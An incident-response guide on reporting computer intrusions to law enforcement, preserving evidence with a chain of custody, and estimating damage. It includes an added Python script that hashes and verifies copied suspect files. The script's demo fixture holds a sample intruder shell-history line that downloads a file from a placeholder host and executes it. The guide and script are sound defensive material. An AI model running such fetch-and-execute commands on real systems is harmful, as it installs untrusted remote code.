If your systems are hacked or intruded upon by an unauthorized party, you should call your local FBI office or contact the NIPC (National Infrastructure Protection Center). When you experience a crime against your computer systems, the FBI and the NIPC recommend that you respond quickly and contact law enforcement: tracing the intruder is often impossible if too much time passes before law enforcement or your own incident-response team is alerted.
If you are unsure what to do, do not stop system processes or tamper with files; doing so may destroy traces of the intrusion. Follow organizational policies and procedures. (Your organization should have a computer incident-response capability and plan in place before an incident occurs.) Do not contact the suspected perpetrator.
Also remember to use the telephone to communicate. An attacker who has compromised your systems may be able to monitor e-mail traffic, so coordinate over a channel that does not run through those systems. Contact your organization's incident-response team. (Quick use of technical expertise is crucial in preventing further damage and protecting potential evidence.) You should also establish points of contact with general counsel, emergency-response staff, and law enforcement before an incident; preestablished contacts make a quick response possible.
It is advisable to make copies of files an intruder may have altered or left behind, preserving the originals' timestamps and recording a cryptographic hash of each original and each copy so that the copies can later be shown to be unaltered. If you have the technical expertise to do this, it will help investigators establish when and how the intrusion occurred.
You should also identify a primary point of contact to handle potential evidence. This facilitates establishing a chain of custody: a record of who held each item, when, and what was done to it. (Hardware and software evidence that is not properly controlled may lose its evidentiary value.)
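The two preceding paragraphs describe preserving copies of suspect files and keeping them under a chain of custody. The following is an added example, not code from the original page, showing one way to do that in practice: copy each file with its timestamps intact, hash both original and copy, write a manifest that records the hashes and the collector, and re-verify the copies later. The case ID, collector name, directory layout and sample file contents are constructed for illustration.

```python
"""Evidence preservation for an incident: copy suspect files with their
timestamps intact, hash originals and copies, and write a manifest that a
chain-of-custody record can reference.

Added example, not code from the original page. Case IDs, collector names,
paths and file contents below are constructed for illustration.
"""
import hashlib
import json
import os
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def sha256_file(path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large logs or images need not fit in memory."""
    h = hashlib.sha256()
    with Path(path).open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def preserve_file(src: Path, dest_dir: Path) -> dict:
    """Copy one file into dest_dir and record what was copied.

    The original's metadata is captured before anything touches it, copy2()
    keeps the modification time (plain copy() would not), and the copy is
    re-hashed so a copy that differs from its source is never entered as evidence.
    """
    dest_dir.mkdir(parents=True, exist_ok=True)
    dest = dest_dir / src.name
    st = src.stat()
    src_hash = sha256_file(src)
    shutil.copy2(src, dest)
    if sha256_file(dest) != src_hash:
        raise RuntimeError(f"copy of {src} does not match the original")
    return {
        "source_path": str(src),
        "evidence_path": str(dest),
        "sha256": src_hash,
        "size_bytes": st.st_size,
        "source_mtime_utc": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc).isoformat(),
    }


def build_manifest(files, dest_dir: Path, collector: str, case_id: str) -> Path:
    """Preserve each file and write manifest.json beside the copies.

    Returns the manifest path. The manifest's own SHA-256 is what goes on the
    custody form, since it commits to every file hash at once.
    """
    manifest = {
        "case_id": case_id,
        "collected_by": collector,
        "collected_at_utc": datetime.now(timezone.utc).isoformat(),
        "files": [preserve_file(Path(p), dest_dir) for p in files],
    }
    path = dest_dir / "manifest.json"
    path.write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return path


def verify_manifest(manifest_path) -> list:
    """Re-hash every preserved copy; return evidence paths that are missing or changed."""
    manifest = json.loads(Path(manifest_path).read_text())
    bad = []
    for entry in manifest["files"]:
        p = Path(entry["evidence_path"])
        if not p.is_file() or sha256_file(p) != entry["sha256"]:
            bad.append(str(p))
    return bad


def demo() -> dict:
    """Constructed scenario: preserve two suspect files, verify, then detect tampering."""
    root = Path(tempfile.mkdtemp(prefix="ir-demo-"))
    try:
        suspect = root / "suspect"
        suspect.mkdir()
        # Constructed sample contents standing in for files an intruder left behind.
        (suspect / "authorized_keys").write_text("ssh-ed25519 AAAAC3Nza... intruder@example\n")
        (suspect / ".bash_history").write_text("wget http://example.invalid/x && chmod +x x && ./x\n")
        evidence = root / "evidence"
        manifest = build_manifest(sorted(suspect.iterdir()), evidence, "J. Analyst", "IR-0001")
        manifest_hash = sha256_file(manifest)
        entries = len(json.loads(manifest.read_text())["files"])
        clean = verify_manifest(manifest)
        # Simulate someone editing a preserved copy after collection.
        (evidence / ".bash_history").write_text("")
        tampered = [os.path.basename(p) for p in verify_manifest(manifest)]
        return {"entries": entries, "manifest_sha256": manifest_hash,
                "clean": clean, "tampered": tampered}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two caveats a practitioner should keep in mind: merely reading the originals to hash them can update their access times on a live filesystem, so collect from a read-only mount or a disk image where that matters; and file copies of this kind supplement, rather than replace, the full forensic image investigators may ask for.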
Compile as much information as possible about the incident. Law-enforcement investigators will find the following helpful:
Date, time, and duration of incident
The name, title, telephone number, fax number, and e-mail of the point of contact for law enforcement, as well as the name of your organization, address, city, state, zip code, and country
The physical locations of computer systems and/or networks that have been compromised
Whether the systems are managed in-house or by a contractor
Whether the affected systems or networks are critical to the organization's mission
If your organization is part of the critical infrastructure, which sector was affected, such as:
Agriculture and food
Defense industrial base
Banking and finance
Chemical industry and hazardous materials
Postal and shipping
National monuments and icons
Nuclear power plants
Commercial key assets
The nature of the problem, which could include intrusion, system impairment, denial of resources, unauthorized root access, Web site defacement, compromise of system integrity, theft, or damage
Whether the problem has been experienced before
The suspected method of intrusion or attack, which could include a virus, an exploited vulnerability, a denial of service, a distributed denial of service, a trapdoor (backdoor), or a Trojan horse
The suspected perpetrators and the possible motivation for the attack, which could include an insider or disgruntled employee, a former employee, or a competitor. (If the suspect is an employee or former employee, you should determine and report the type of system access that the employee has or had.)
The apparent source (IP address) of the intrusion or attack, if known, and whether there is any evidence that it was spoofed
What computer system (hardware, operating system, or applications software) was affected
What security infrastructure was in place, which could include an incident-response team, encryption, a firewall, secure remote access or authorization tools, an intrusion detection system (IDS), security auditing tools, access control lists, or packet filtering
Whether the intrusion or attack resulted in a loss or compromise of sensitive, classified, or proprietary information
Whether the intrusion or attack resulted in damage to systems or data
What actions have been taken to mitigate the intrusion or attack, such as disconnecting the system from the network, checking system binaries, backing up affected systems, or examining log files
What agencies have been contacted, such as state or local police, CERT, or FedCIRC
When your system was last modified or updated, and the name of the company or organization that did the work (address, phone number, and point of contact)
It is also necessary to determine a dollar value for damage, business loss, and cost to restore systems to normal operating conditions. The following information is helpful in determining dollar amounts:
In the event that repairs or recovery were performed by a contractor, you should determine the charges incurred for services.
If in-house staff were involved in determining the extent of the damage, repairing systems or data, or restoring systems to normal operating conditions, you should determine the number of hours staff expended to accomplish these tasks and the hourly wages, benefits, and overhead associated with each employee involved in the recovery.
If business was disrupted in some way, you should determine the number of transactions or sales that were actually disrupted and their dollar value.
If systems were impaired to the point that actual disrupted transactions or sales cannot be determined, then you should determine the dollar value of transactions or sales that would occur on a comparable day, for the duration of the system outage.
If systems are used to produce goods, deliver services, or manage operations, then determine the value of the loss due to that disruption. (You may have had similar experiences if operations were disrupted because of inclement weather, fires, earthquakes, or other disruptive incidents.)
If systems were physically damaged, you need to know what you paid to acquire and install the systems.
If systems were stolen, you need to know what you paid to acquire and install the systems and the cost of actions taken to ensure that information on the stolen systems (such as stored credentials and keys) cannot be used to access your remaining systems.
If intellectual property or trade secrets were stolen, then you need to determine the value of that property.
If intellectual property or trade secrets were used by a competitor or other party, then you need to determine the impact on your business.
A good source of information about dealing with intrusions is available from the High Tech Crime Investigation Association Web site www.htcia.org, and specific information is available at the San Diego Chapter's Web site, www.htcia-sd.org. The San Diego Chapter has also published a guide for working with law-enforcement agencies when you have had a computer incident; this is available at www.htcia-sd.org/htciaguide.pdf.